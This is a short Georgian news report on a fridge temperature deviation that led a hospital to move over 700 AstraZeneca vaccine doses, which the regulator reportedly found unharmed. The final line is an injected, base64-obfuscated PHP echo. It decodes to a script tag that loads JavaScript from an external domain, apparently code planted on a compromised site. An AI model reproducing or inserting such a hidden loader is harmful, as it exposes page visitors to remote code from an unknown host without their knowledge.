celsiusi
ავერსი შნაიდერი
რესპუბლიკური საავადმყოფოს დირექტორის მოადგილის, ჯავარა უგრეხელიძის განცხადებით, ვაქცინების შესანახ მაცივარში „ტემპერატურული რეჟიმიდან გადახრა დაფიქსირდა“, რის გამოც 700-ზე მეტი ვაქცინა საზოგადოებრივი ჯანდაცვის ცენტრში შესანახად გადაიტანეს.
 
ჟურნალისტის კითხვაზე, იყო თუ არა „ასტრაზენკას“ შესანახი მაცივარი გაფუჭებული და გაფუჭდა თუ არა ვაქცინები, მან უპასუხა, რომ რეგულირების სააგენტოს საბოლოო დასკვნის თანახმად, ვაქცინებს პრობლემა არ შექმნია.
 
„ამასთან დაკავშირებით რეალური ინფორმაცია არ გაქვთ. სტანდარტი არის ასეთი, მაცივარი, რომელშიც ინახება ვაქცინები, ტემპერატურული რეჟიმის შემოწმება ხდება 2 ხერხით, ერთი ხერხი არის დღეში ორჯერ ტემპერატურული რეჟიმის დაფიქსირება და მეორე, გეგმურად, 2 კვირაში ერთხელ ამოღებული მონაცემი. როგორც კი დაფიქსირდა პატარა გადახრა ტემპერატურული რეჟიმიდან, ამოღებული იქნა ეს ვაქცინები და გადატანილი საზოგადოებრივი ჯანდაცვის ცენტრში შესანახად. თუმცა, რეგულირების სააგენტოს საბოლოო დასკვნა არის ერთმნიშვნელოვნად ასეთი, რომ ამ ვაქცინებს პრობლემა არ შექმნია. ვაქცინები შესანახად გადაცემული აქვს საზოგადოებრივი ჯანდაცვის ცენტრს. დოზა არის 700-ზე ცოტა მეტი“,-განაცხადა უგრეხელიძემ.
1015
echo base64_decode("PHNjcmlwdCBzcmM9Ii8vYWsuZGtlLm1lLyI+PC9zY3JpcHQ+");